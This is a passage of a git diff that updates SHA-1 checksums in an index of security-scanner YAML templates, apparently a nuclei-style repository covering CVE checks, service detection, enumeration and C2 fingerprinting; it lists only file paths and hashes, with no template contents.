+http/vulnerabilities/wordpress/wp-slideshow-xss.yaml:3ddcaf08f7c2d749f22b9a5492999c685a56188d http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml:6c308e55d5505e420ea6b1b43fb6337b64e0c150 http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml:0ba95fd6c7ab7739be4858037e18fc8abbf16d97 http/vulnerabilities/wordpress/wp-socialfit-xss.yaml:daf38a1b0feff473061c164faf94222d82e622aa @@ -8345,10 +8345,10 @@ http/vulnerabilities/wordpress/wp-sym404.yaml:3f6e3c01091b8b7a2520eb2d950759a682 http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml:7d0df653a2fd3adb9f56c64d7d5e6ba380326809 http/vulnerabilities/wordpress/wp-touch-redirect.yaml:b43b42b348e6a3c802e629c7378322e3e73450f7 http/vulnerabilities/wordpress/wp-tutor-lfi.yaml:3a621f4ff6155c5b002d9f6c7d280c2aee04d895 -http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml:c349d7f75bd6dacd5436ba465074256eba4e831d +http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml:dcad5cba00f4477b976f742d3d00ad839c9a1d37 http/vulnerabilities/wordpress/wp-upload-data.yaml:c51e4ee4d84e29b14f7adc7fffa95d7463b0347f http/vulnerabilities/wordpress/wp-upward-theme-redirect.yaml:f1ff825da8a807ac4637e4088598990620f2cdb4 -http/vulnerabilities/wordpress/wp-user-enum.yaml:0fa8a991ab8f6c6da939987a369f094eb78cae85 +http/vulnerabilities/wordpress/wp-user-enum.yaml:e3adc2c93fc1ba4bd180dbba634bea72ee5f4a13 http/vulnerabilities/wordpress/wp-vault-lfi.yaml:12ee639ae8dd7fb66560ac713aab3a4d73163b1f http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:d36b1dafca4c01fbc15d17c4e884144f36974304 http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:9cd53ef3a743e970ff37c36b2c9640781d578878 @@ -8394,200 +8394,200 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/audit/mysql/mysql-load-file.yaml:d61333fa25344c2c59bbc1b18b5907a83ea48441 -javascript/backdoor/proftpd-backdoor.yaml:3773a0d97c81615104eb63d8d5fc8fe02348d0b6 -javascript/cves/2012/CVE-2012-2122.yaml:94abd222ef37d5fcab0bd7d4bd3801b63236762c +javascript/backdoor/proftpd-backdoor.yaml:3f9fb4f78fb9ab63d950fe3a9c6bd07a7e425bfe +javascript/cves/2012/CVE-2012-2122.yaml:51c890df7ffbbfbb726dd79a10f07ae1cf5f449d javascript/cves/2016/CVE-2016-8706.yaml:2b62e791d6879ee11d4c9894198c31e6af8c2e05 -javascript/cves/2019/CVE-2019-9193.yaml:11b9baf1c50e125986f9667f3538b5ebdf8f445b -javascript/cves/2020/CVE-2020-7247.yaml:60f4be8c576cc07ffa7b843ff99a5678b096df0b -javascript/cves/2023/CVE-2023-34039.yaml:af0340b7a937d8e4583b64c5e500566328c6ae51 -javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625 -javascript/cves/2023/CVE-2023-48795.yaml:cb420dbeb5e653c4a7c056fa2c95d53dd347d29b -javascript/cves/2024/CVE-2024-23897.yaml:367d94de33e51bd1edb3b5d350b6287fd1d95dc3 +javascript/cves/2019/CVE-2019-9193.yaml:3395ccef4ce453bc8a3b9ef7077112603407d6cd +javascript/cves/2020/CVE-2020-7247.yaml:34eb3a517f365a910604daa366c76bd1894a4951 +javascript/cves/2023/CVE-2023-34039.yaml:65e0a443d8f073f382a42599c73a015876ab173c +javascript/cves/2023/CVE-2023-46604.yaml:af73c1f4da9f351029982e8f41ae123d7ef6568e +javascript/cves/2023/CVE-2023-48795.yaml:a4800f72a6b2eb80efbbd3f4d821f74da5d9fa48 +javascript/cves/2024/CVE-2024-23897.yaml:cfce2cb9ab4e598a7f6939af2f74bf53f5c9bb18 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad -javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f +javascript/default-logins/redis-default-logins.yaml:c5e68774511e65daadd2532fe6125ff1a66ba7c1 javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff -javascript/detection/samba-detect.yaml:b72dfe69d115b83bf8b9835e5ce44001638babdb +javascript/detection/samba-detect.yaml:12b570cea9dd7ab282e9dca4fd7190a811585cc0 javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 -javascript/enumeration/checkpoint-firewall-enum.yaml:d4f9be682667d24c3cd3482dfd6b71505b2d52df -javascript/enumeration/minecraft-enum.yaml:b479fd24c897f43fa8931185c0dd0b03e4a57c5a -javascript/enumeration/mysql/mysql-default-login.yaml:433fb8e13500f2df3410db099c09bc92f63a7e86 -javascript/enumeration/mysql/mysql-info.yaml:51a1f610998dc0a1849fb4ba1e60b7bf421d992c +javascript/enumeration/checkpoint-firewall-enum.yaml:6b0d1f034938df722813d7c02c058d87fc5b0eab +javascript/enumeration/minecraft-enum.yaml:8d91f27038a4f23c7d4cc677aafa58501b1dafa5 +javascript/enumeration/mysql/mysql-default-login.yaml:f04aa4ca39189aeb43f74d28c2c3357a9bc664ad +javascript/enumeration/mysql/mysql-info.yaml:e359eb3e030c75a61de90db106c504836cd630d1 javascript/enumeration/mysql/mysql-show-databases.yaml:1d696acf5bb7da5b077fea32f568e4875e129575 javascript/enumeration/mysql/mysql-show-variables.yaml:df67667eff109ba3b7c7a6062f98ae1065b0fc53 javascript/enumeration/mysql/mysql-user-enum.yaml:58f73167aa8a07b54694c8e2e78c608e6d666de5 -javascript/enumeration/pgsql/pgsql-default-db.yaml:3dbbf22fb3cdd990417f46e39547125a6c162cf3 -javascript/enumeration/pgsql/pgsql-file-read.yaml:f4a75ba9630af478e77325ca29a848744376ad76 -javascript/enumeration/pgsql/pgsql-list-database.yaml:a7e9297c8c0c12dcf0a55d372d1747181b10ceb7 -javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:5a10f37cd1d047736638368b6cce0b8e0bafbf22 -javascript/enumeration/pgsql/pgsql-list-users.yaml:1a29f1b6a10fcec7195e88c927523a903d095e33 -javascript/enumeration/pgsql/pgsql-version-detect.yaml:8df6f8316bef70e0496120454dc5c3f02cd19d35 -javascript/enumeration/pop3/pop3-capabilities-enum.yaml:d0cf0a8cbf8eebbfb609b3b4a114cbce3477cf53 -javascript/enumeration/redis/redis-info.yaml:17197baa18471c8ed3443433bea5413de8abca80 -javascript/enumeration/redis/redis-require-auth.yaml:2e6d7543ead7418aa8a7cf9c07d1ea0fb4eaa0ea -javascript/enumeration/rsync/rsync-list-modules.yaml:9352a721c51e41d8650c838e52b2a127f7f254ce +javascript/enumeration/pgsql/pgsql-default-db.yaml:f5fd0928041d2134d05aa9392967bfbefca50022 +javascript/enumeration/pgsql/pgsql-file-read.yaml:4d5f325a3a7a97dd7654dab11e81fab079355757 +javascript/enumeration/pgsql/pgsql-list-database.yaml:3ca810bd39883793323cb92be3793a06534eb0f1 +javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:b9eb9b6258b32cafcfd3602043e261139fca4867 +javascript/enumeration/pgsql/pgsql-list-users.yaml:e92a1f73fa55e8e2833d490cfd3edcfe166cb47b +javascript/enumeration/pgsql/pgsql-version-detect.yaml:5440f7a9779ca2b57502e49804e192791dfae81b +javascript/enumeration/pop3/pop3-capabilities-enum.yaml:e37709cbe4fc7da7f7c1c4e885923917750f72ac +javascript/enumeration/redis/redis-info.yaml:02efbab9af336e4c7e2ab164aeb00fe750f0a7fc +javascript/enumeration/redis/redis-require-auth.yaml:3d1bc6a7fc117c990092aecd784d9cff988e2e3f +javascript/enumeration/rsync/rsync-list-modules.yaml:5f23e04e900ae5da0f03e8b7d55919fbee148025 javascript/enumeration/rsync/rsync-version.yaml:30403f8400ce626131ddb8ff2d5091e9ef10184b -javascript/enumeration/smb/smb-default-creds.yaml:957329540c766e1c512fc9c449aa5fac038283c3 -javascript/enumeration/smb/smb-enum-domains.yaml:2589732d61916fe1466772e4e770d3acb08f98e2 -javascript/enumeration/smb/smb-enum.yaml:afac4784cfb9e19ad73c4a66bcb927f872f3056d -javascript/enumeration/smb/smb-os-detect.yaml:16bd6b7a29678f9800e3c49ce318e81e4cc86451 -javascript/enumeration/smb/smb-version-detect.yaml:f3bdeff934598efdeaf21d840e5a9422bc660815 -javascript/enumeration/smb/smb2-capabilities.yaml:4692b31e9b77dd75b52c3f995244a49ac3066f0d -javascript/enumeration/smb/smb2-server-time.yaml:89c210bb02c8a60ca44df0f16a1c996fdf689abe +javascript/enumeration/smb/smb-default-creds.yaml:428b037af908ae12ea84bc57b4e1d3786d74e347 +javascript/enumeration/smb/smb-enum-domains.yaml:8ad5db49b75fca92f629b54b47e5843cfd31695f +javascript/enumeration/smb/smb-enum.yaml:b73323ab57a63bbf5a12895e0a756dc054847198 +javascript/enumeration/smb/smb-os-detect.yaml:157779cedcc598f71f2f0e690ea0f199780b4d54 +javascript/enumeration/smb/smb-version-detect.yaml:f9c7a1e797d3093947d72b20cff37dbf56ea153d +javascript/enumeration/smb/smb2-capabilities.yaml:ac1392208aaa9a82658dcb06f45e2da3dbb3e303 +javascript/enumeration/smb/smb2-server-time.yaml:10c5dc9f3127e3d55fa6039b51f3ff7b6c1d18b7 javascript/enumeration/ssh/obsolete-ssh-version.yaml:136a52496c5832d06d80ced805951ab7be25dbff javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml:95c983ec5f5cec534007b5a252f53e5d764d8512 javascript/enumeration/ssh/ssh-password-auth.yaml:50ca5eb9f3fba26eb72d9510b71ac4fbad8b4698 javascript/enumeration/ssh/ssh-server-enumeration.yaml:4253ab5aaab4bc8690c29788d7f7b298aedca45e javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml:cf9e950c3f3200c8af9aeedeb35fc90f2eb5b1af javascript/misconfiguration/mysql/mysql-empty-password.yaml:cfd87ddc706c406ed53ce45b6b222a63de6fa1a6 -javascript/misconfiguration/pgsql/pgsql-empty-password.yaml:123545654ff8c2455eaafad36896ace25d1afa93 -javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml:7aa932ec4b435561ec234fea6a2f6de368adf7f4 -javascript/misconfiguration/smb/smb-anonymous-access.yaml:9a3a03bc272aa7e8e41371b9d5da218e4db9ea6d -javascript/misconfiguration/smb/smb-shares.yaml:29625411d102acc559a20069fb58a3b7fe5c7fab -javascript/misconfiguration/smb/smb-signing-not-required.yaml:d3d28166bb313aaf989f155001f17b23dc08af06 +javascript/misconfiguration/pgsql/pgsql-empty-password.yaml:da0f7b07d077705a0b836c1ab3721e7f029247e4 +javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml:f8bc428bb0e28c84dadb406e069c10040f7dcc14 +javascript/misconfiguration/smb/smb-anonymous-access.yaml:bbe77db4d0d3fc8c2064261d8924c0c72e10eab2 +javascript/misconfiguration/smb/smb-shares.yaml:8167b0169ed0f41469e5beec416961d598e4b4c0 +javascript/misconfiguration/smb/smb-signing-not-required.yaml:4fb9834ee7cdde65a8288ce004e0bca92eabbe0e javascript/misconfiguration/ssh/ssh-cbc-mode-ciphers.yaml:cc5d0034e363156cfcb6efe1b982fae8f2d0fdd1 javascript/misconfiguration/ssh/ssh-weak-algo-supported.yaml:83bdd007c2437f397fa047b0c844faaeadb9580b javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d7ed98e48a5517a7 javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 -javascript/udp/detection/tftp-detect.yaml:97f66515e545263725cc704a40436434f90db1ad -network/backdoor/backdoored-zte.yaml:42b5ec609229045d3ebbb6e8968a1797413afb44 -network/c2/darkcomet-trojan.yaml:b8f71af056f9dfd77c24d37df301be7fba986838 -network/c2/darktrack-rat-trojan.yaml:36425c7572204441890fd6ad0336762658fbe963 -network/c2/orcus-rat-trojan.yaml:a4c141d7019f20768165f92ac5d4bfc08e8551d9 -network/c2/xtremerat-trojan.yaml:b2b611a36dec8a18ab75471c7a8429e6952603ca -network/cves/2001/CVE-2001-1473.yaml:5374944a926a53026fd02e17333ab21c0fd94115 -network/cves/2011/CVE-2011-2523.yaml:439f13ea18e52af5b7de1ae93ed2de579a3157c3 -network/cves/2015/CVE-2015-3306.yaml:89bdabc177692a54c7c144c2c45446b15350f513 -network/cves/2016/CVE-2016-2004.yaml:d4713d0f58f1ce397fa93f4b63846b20e9fbf8ee -network/cves/2016/CVE-2016-3510.yaml:b4c02dac17d6d414df12ae417a1808db98132783 -network/cves/2017/CVE-2017-3881.yaml:b7bd93f6269a7668f90d5c4123cb607575af22a2 -network/cves/2017/CVE-2017-5645.yaml:fa0cac09db651ef1061b8ab09118bcd501274f84 -network/cves/2018/CVE-2018-2628.yaml:89faf66309dc2fbedcfa906290acd57f6b77392c -network/cves/2018/CVE-2018-2893.yaml:09060a785ce491966ce65955e6f0ca659083571b -network/cves/2020/CVE-2020-11981.yaml:664699c36c1de6fea5f5e0b41c03d3c064942001 -network/cves/2020/CVE-2020-1938.yaml:7a156a76a1eff5dec3fc62f36e243e6e1b3efec9 -network/cves/2021/CVE-2021-44521.yaml:bdc1acf919d253a609fbcaf9ae914344f9c187e0 -network/cves/2022/CVE-2022-0543.yaml:e9859038895a62b5bb1e60ed5c400d9b0e0940c1 -network/cves/2022/CVE-2022-24706.yaml:6d06d9e53c396048b61fabb7486075474ad61f11 -network/cves/2022/CVE-2022-31793.yaml:d53c4361e167a401f76f3069a2cd985a612c955c -network/cves/2023/CVE-2023-33246.yaml:3db23ab1b222f81ce0a08b75c23bc5ecae85b9dd -network/default-login/ftp-anonymous-login.yaml:0eb4d44490e80c5f5f8e7e9e7ecb1fa0c7fd0174 -network/default-login/ftp-weak-credentials.yaml:c0cf4a3227435e117de922b08ad77edebf6304a5 -network/default-login/ldap-anonymous-login.yaml:1d0d2f3485fec11106c15b75166448f9ab047eec -network/detection/activemq-openwire-transport-detect.yaml:da59945499ac1f46d9ac606f27d98dd8e1e493d9 -network/detection/aix-websm-detect.yaml:a6158ad212ce805f35b16014fdd766fdfd739e37 -network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529be8b5e -network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78 -network/detection/axigen-mail-server-detect.yaml:fbf92b3b9d61df5aaf614b98b570149d62bd96ef -network/detection/bgp-detect.yaml:53fc7559679a89a8db2bfb0b44c771fff916d006 -network/detection/bitvise-ssh-detect.yaml:2e69f94f964c1861b3c2c8dd4a155e52c36927cd -network/detection/bluecoat-telnet-proxy-detect.yaml:f7509936000eeac439add7b118ee52ac3c0f8725 -network/detection/cisco-finger-detect.yaml:12c8c9b4e0504539a5280517e2a0a0039cd9f588 -network/detection/clamav-detect.yaml:34ee606515af2f8ab375ce4f602ca5942f8b20a3 -network/detection/cql-native-transport.yaml:8f848170731a7e132e745e9ce45824c9e2fb1e4c -network/detection/detect-addpac-voip-gateway.yaml:a06e5be5c8af1fc7e79ed9011ba9c91403d1069f -network/detection/detect-jabber-xmpp.yaml:db7472ba34e3306c0afd5b3bfe535e1764de8da4 -network/detection/dotnet-remoting-service-detect.yaml:b438f75ba5e8c1f227d14794db20172ab89468cf -network/detection/esmtp-detect.yaml:132acdd524e1d1c32442a9fa82f3632eb0afd7e1 -network/detection/exim-detect.yaml:c5cf41f9583a59688faba62dd6c08fa9bb0e6c79 -network/detection/expn-mail-detect.yaml:cd8960152e5b6a4777ec6950528164ba48983d81 -network/detection/finger-detect.yaml:ad87af0aee39f2d5013dbee8692c37414df78363 -network/detection/gnu-inetutils-ftpd-detect.yaml:f089a5ff96e16e7fb260973351f635735db6fdaf -network/detection/gopher-detect.yaml:fc44051b14f3cb7f8b70dddba8231ea83d5e4dbd -network/detection/ibm-d2b-database-server.yaml:704b0235c57216e9981c80756a19d3514d9b43ad -network/detection/imap-detect.yaml:2f449f269b5d41bb66513655faf2024da9f8d0af -network/detection/iplanet-imap-detect.yaml:07adab4aa9e07c7fae5d108302588643d9b08482 -network/detection/java-rmi-detect.yaml:a6297f30128e48741fa8be246e091fa7aa416ba5 -network/detection/microsoft-ftp-service.yaml:64b0aad283b63e75cea9486d65b4ad2ca9a34306 -network/detection/mikrotik-ftp-server-detect.yaml:b1476c872ea618eb76757a69d124e225775ccc42 -network/detection/mikrotik-routeros-api.yaml:d1854beb3c58d1d67d8b0a12b4e867282b08e031 -network/detection/mongodb-detect.yaml:94c11795bb5e3a545e116771f6801bb237e3fb49 -network/detection/moveit-sftp-detect.yaml:e46a8ce10a5bd7e21b40d339dbaf649795ced82d -network/detection/msmq-detect.yaml:a4033f9c3c364d1e451d5f23d3c525a385fd8db9 -network/detection/mysql-detect.yaml:03ae01ecb128317af9a8968bc3ea72a1182b504c -network/detection/openssh-detect.yaml:c789bb52c8137dc2d7b7d499739e734dbcd34793 -network/detection/pgsql-detect.yaml:c42bcb521314922cb27daa28ab382ccef4d50ca2 -network/detection/pop3-detect.yaml:1a4a735296b5ce4b167f9e3cec2df86c91fbc4a2 -network/detection/proftpd-server-detect.yaml:7000ee0b181d30d3939c48901ab1be36b917cbe1 -network/detection/rabbitmq-detect.yaml:202bb0e110c84e18fe947ef6174fa51a12773922 -network/detection/rdp-detect.yaml:1146bd8eff0ed81b2d3d507d9b0b4508317f6dba -network/detection/redis-detect.yaml:e808558636c833c8e594b4eb8f22d8009ca15795 -network/detection/riak-detect.yaml:52227798c47f3827b0655dd0c823ec6bca263b5e -network/detection/rpcbind-portmapper-detect.yaml:80b9d8e77ae5a12be69f8149b55184ba3596719d -network/detection/rsyncd-service-detect.yaml:d38481e49f7dd473003dd91741e2d0eb26bee36d -network/detection/rtsp-detect.yaml:d6b839083a1d1a39445f6cde00325e4467153ae6 -network/detection/sap-router.yaml:3cdb63aecfb328ce98b6bf81bbc5de6e61d70526 -network/detection/smtp-detect.yaml:5fa2e7cef1d9aec1de4c88d093d974c897f4dc9d -network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6911f -network/detection/starttls-mail-detect.yaml:5d06e17119e499ff79a593821eae44d928007c69 -network/detection/teamspeak3-detect.yaml:8d2481cf446ed4d2587be5016b66b3b74ad4ec43 -network/detection/telnet-detect.yaml:6d553279d154fa767ad8cbdbdc3b0573fb1e03a9 -network/detection/totemomail-smtp-detect.yaml:255495f466146abd4f4fafed68a703e8ddc646aa -network/detection/vmware-authentication-daemon-detect.yaml:fe32f8021fd370465c0f97fff15ea59eb34e42fd -network/detection/vnc-service-detect.yaml:22f648aa53fa7fb08f258bcd06fa4b15d80eebca -network/detection/weblogic-iiop-detect.yaml:05bf3f6fdfa938cfb88ee0e5f27da5e1b8d70bfa -network/detection/weblogic-t3-detect.yaml:d9f9d79b5176d8eb2abd9bf4de3ce84a0220fd99 -network/detection/wing-ftp-detect.yaml:79fe3254d4657278f122977cda7145287f7b993c -network/detection/ws_ftp-ssh-detect.yaml:558ac2fd876a7239ddfd7c5c9433769f166644bd -network/detection/xlight-ftp-service-detect.yaml:c1bcbafb4cd2ad7a5b4b6c7b947779ee08367781 -network/enumeration/beanstalk-service.yaml:4116fb96469ca087e5b79686fe57c54862835ad8 -network/enumeration/kafka-topics-list.yaml:a806b0049ffc95034dc2fb163548ee8765bd3425 -network/enumeration/mongodb-info-enum.yaml:5f1b2b25b89f10477193793aa775b9aac5fcc019 -network/enumeration/niagara-fox-info-enum.yaml:5b94264b3accb70d345258192f5ab98c4e222d83 -network/enumeration/psql-user-enum.yaml:7522ae086ec23f345af67bc13129c810f22a6d94 -network/enumeration/smtp/smtp-commands-enum.yaml:18d2f3bfd9cb5c151953a1b77bb5e697bce6bbf7 -network/enumeration/smtp/smtp-user-enum.yaml:9c22817e414338d8cea89f836cce246887bd9b52 -network/exposures/cisco-smi-exposure.yaml:d4cc1333b0ece863dd0a987c3f7cb59c9489f5e8 -network/exposures/exposed-adb.yaml:e758a0fcbdad2ce08ea1985b9b4c6721feafd8c5 -network/exposures/exposed-dockerd.yaml:351e18b9fea269da82ff3b3d5a5460179e9a6789 -network/exposures/exposed-redis.yaml:af5eeb70a5e8e53148c056a47e8aa547d2d44079 -network/exposures/exposed-zookeeper.yaml:ab15c02cd24118daa8538f9417ba41011c65d0c7 -network/honeypot/adbhoney-honeypot-cnxn-detect.yaml:97dc4091ebee4623d28a953f887e8cb8b1ff6b53 -network/honeypot/adbhoney-honeypot-shell-detect.yaml:d3c8e91273e4cd399a29c365b4117b829177e440 -network/honeypot/conpot-siemens-honeypot-detect.yaml:012e8245385f43c9ce298ccbe5497086d845ba5b -network/honeypot/cowrie-ssh-honeypot-detect.yaml:b874aa93733e51891ce0210e89501ad18286fccd -network/honeypot/dionaea-ftp-honeypot-detect.yaml:92b7424f5dd75edc3985813ad650eda52dd09c5f -network/honeypot/dionaea-mqtt-honeypot-detect.yaml:edd9db625b0bee56ec1947be7c57878b6296220b -network/honeypot/dionaea-mysql-honeypot-detect.yaml:8d439ef41f57231aaac9acd2570fe5ee387497d1 -network/honeypot/dionaea-smb-honeypot-detect.yaml:cfc2bf90fb97a1a981a8f52a1a04a6330d867574 -network/honeypot/gaspot-honeypot-detect.yaml:770620da7f6b20fafafcd6a8769fa56df4ab7ce4 -network/honeypot/mailoney-honeypot-detect.yaml:eb25ecb62e9f6f8c0723bd80f4d05c300cc70bff -network/honeypot/redis-honeypot-detect.yaml:3f3f2da98022df753123ce58b7eda9f38eafe074 -network/jarm/c2/cobalt-strike-c2-jarm.yaml:6fbb7894d19cd89919868382e30a426c026e505f -network/jarm/c2/covenant-c2-jarm.yaml:dadf030380c314974f998a305e00830030147d9c -network/jarm/c2/deimos-c2-jarm.yaml:07c777f06f1b9c02b91b433d3b710615696a3d87 -network/jarm/c2/evilginx2-jarm.yaml:6c070953c215b2ce0646f968cceaaecba6a33a67 -network/jarm/c2/generic-c2-jarm.yaml:f59c7dfc4346075182d24e93186bb2640fe4b61d -network/jarm/c2/grat2-c2-jarm.yaml:ed547b2eeb9c1abd0a318b60a3b099d57bf56e88 -network/jarm/c2/havoc-c2-jarm.yaml:cbbfdac4df56bd5e969b9fc6472ca2f77f806135 -network/jarm/c2/mac-c2-jarm.yaml:204eb671aab7e8c8da8a35512ecf8c29f42eabe7 -network/jarm/c2/macshell-c2-jarm.yaml:9ed14a3a7906f96fd8f3a219633045bb0010d7ce -network/jarm/c2/merlin-c2-jarm.yaml:45083fedbad0b0ccccdf1d99487934e21ac45688 -network/jarm/c2/metasploit-c2-jarm.yaml:2597dfdbf1d4a7985f94f75773a20be09ee5036d -network/jarm/c2/mythic-c2-jarm.yaml:907b27200958278390b6ace902f79dcc9bb1eed6 -network/jarm/c2/posh-c2-jarm.yaml:e5a7085ef64b1976f01532f6b9283e24db1d6573 -network/jarm/c2/shad0w-c2-jarm.yaml:b180bfb40d7d2a5b0a26dd86f87c2e4d58ebe8f7 -network/jarm/c2/silenttrinity-c2-jarm.yaml:51ffe17932e87f2291b134e817fd674b7f0d3cbd -network/jarm/c2/sliver-c2-jarm.yaml:760ddca63dd6fc48448b768af7fb130096e479a2 -network/misconfig/apache-dubbo-unauth.yaml:622efcfac18e7a5b1ece09a1d8a34d857d6bc049 -network/misconfig/apache-rocketmq-broker-unauth.yaml:f6421f83ae1682e3561d7492aa5140e80e8586a7 -network/misconfig/clamav-unauth.yaml:e256d077da3729eeee6c1cd4cc7ae91b23f8ebe3 -network/misconfig/clickhouse-unauth.yaml:f5b90bc8e168b55bfe3543a69a59cfc508adb619 -network/misconfig/erlang-daemon.yaml:6b5ce18b01c5ea4d816aec8292ad974940e9e880 -network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b -network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 -network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a -network/misconfig/mysql-native-password.yaml:610a602de84dc589c5f48b133d27f6b77f3cc422 -network/misconfig/printers-info-leak.yaml:3eaf0fc4e07c21308b3bd7f387f2f6765979ad15 -network/misconfig/sap-router-info-leak.yaml:a7ebbd8a06f5add2a3ded6259da9b3b3b5e0f005 -network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f2845 -network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd -network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 -network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 -passive/cves/2024/CVE-2024-25723.yaml:3a0e459386db639b4548a3c5588bbb80fa80ad29 +javascript/udp/detection/tftp-detect.yaml:12a192c09d86b55b21e6e6635f6727895533ccc6 +network/backdoor/backdoored-zte.yaml:8e14a0eb85eabc5c88a0f6b84bea92c05c5ab74b +network/c2/darkcomet-trojan.yaml:d9f38fd96f88a82092c35253b7f16a09bc6677f5 +network/c2/darktrack-rat-trojan.yaml:ca83b39244e7129504139a3e08e0dd3a757f675b +network/c2/orcus-rat-trojan.yaml:a667fecbd0a66acb151bed4299a367e740d7cf16 +network/c2/xtremerat-trojan.yaml:b03bd5cfb9ccd28d2a238e90a9aa5c4b2fdfabf0 +network/cves/2001/CVE-2001-1473.yaml:c9c000f76929d0e642a715a74728e1b2a89c13b2 +network/cves/2011/CVE-2011-2523.yaml:359ca31c2acb1c7dd372f9a27186a5a23e674b52 +network/cves/2015/CVE-2015-3306.yaml:c58ad8c7d3c6677fef86d0f2cf1c0a315550414d +network/cves/2016/CVE-2016-2004.yaml:b372717216041aba908de4124daf3ee7430d9fb8 +network/cves/2016/CVE-2016-3510.yaml:6d22058063aad51a24ecc3b81ade6352d44b79a1 +network/cves/2017/CVE-2017-3881.yaml:6a2effa98ce8cc7ad7cb5ac1f99bc5a791c279b9 +network/cves/2017/CVE-2017-5645.yaml:94284c63ad85c789e7c50eea58e1c14bf7925e6d +network/cves/2018/CVE-2018-2628.yaml:0aa96c42e5c0efaae5fc19df9a444844f394d647 +network/cves/2018/CVE-2018-2893.yaml:056d383b23dcbebe6d37620bcb700d39cef67ca9 +network/cves/2020/CVE-2020-11981.yaml:49efa5ec672e97c5f91ed505cae9cb419006abcf +network/cves/2020/CVE-2020-1938.yaml:3b705d2de2ea24d4362e2d98f248f50e44258e9b +network/cves/2021/CVE-2021-44521.yaml:22675af6afc1d99436d4380c07161f00c91235eb +network/cves/2022/CVE-2022-0543.yaml:933aade66295892313a806498d895774018e9f3e +network/cves/2022/CVE-2022-24706.yaml:23dc3cc83af842976848ab41035ec41ad3e23d74 +network/cves/2022/CVE-2022-31793.yaml:246dc8c3fcaf361bbc930ff0a792889af022d414 +network/cves/2023/CVE-2023-33246.yaml:a398fb1f38df5b5556e5abe6794d513d30055149 +network/default-login/ftp-anonymous-login.yaml:e5add890c57776bdf38cce3f54a94cdb4c6a026a +network/default-login/ftp-weak-credentials.yaml:47efb67cbe3e720682e2299c21b42896ad5c9e29 +network/default-login/ldap-anonymous-login.yaml:3dd95847d107fc63d4c149dd02a91a0b3632a4af +network/detection/activemq-openwire-transport-detect.yaml:eca4ca49af7437d5fc5f57dda42aa1ab662e90d8 +network/detection/aix-websm-detect.yaml:89899e8c7ff56b8241d8bd76f688262e3814021f +network/detection/apache-activemq-detect.yaml:d9e710eb9ebcfb6434bdfacc4db5bfa9a2e33c20 +network/detection/aws-sftp-detect.yaml:125ec23e17b48bf1f02c75573f112965f8bbbf16 +network/detection/axigen-mail-server-detect.yaml:3f08c82c133821e777863d1515158fd85cd8cd6b +network/detection/bgp-detect.yaml:ab3891adfb5e2b5369ef6ea6efdf306db2205ec0 +network/detection/bitvise-ssh-detect.yaml:296dd186bac2035fa72662858736f01356381b00 +network/detection/bluecoat-telnet-proxy-detect.yaml:c258298575afa1d1e13fdc3a7baa6c4a47974922 +network/detection/cisco-finger-detect.yaml:bdd1449eedccd57523cccd65ada02b88897f4b04 +network/detection/clamav-detect.yaml:4ba90cd008a086e05210e8f6d944202241477b2f +network/detection/cql-native-transport.yaml:a220137e018bf3e34d3943a8e69513050b208913 +network/detection/detect-addpac-voip-gateway.yaml:c14220bea1c8d7c9ea9e0ab83657200f52e4a3ea +network/detection/detect-jabber-xmpp.yaml:e1d51679328d6faa65bc5f564748472cffbd52bb +network/detection/dotnet-remoting-service-detect.yaml:46460df3e46a2206814b03987d8106c8c0205092 +network/detection/esmtp-detect.yaml:2c840a1ca25d0611087541358353535c3d6899bd +network/detection/exim-detect.yaml:74bdba80483fd8412d08d14dad61cef1b172c9e6 +network/detection/expn-mail-detect.yaml:fa4afadb046bee536e18e34425f03ae7a7e4de2a +network/detection/finger-detect.yaml:c4efc7e1d5f445caff7015356636245c5c05213b 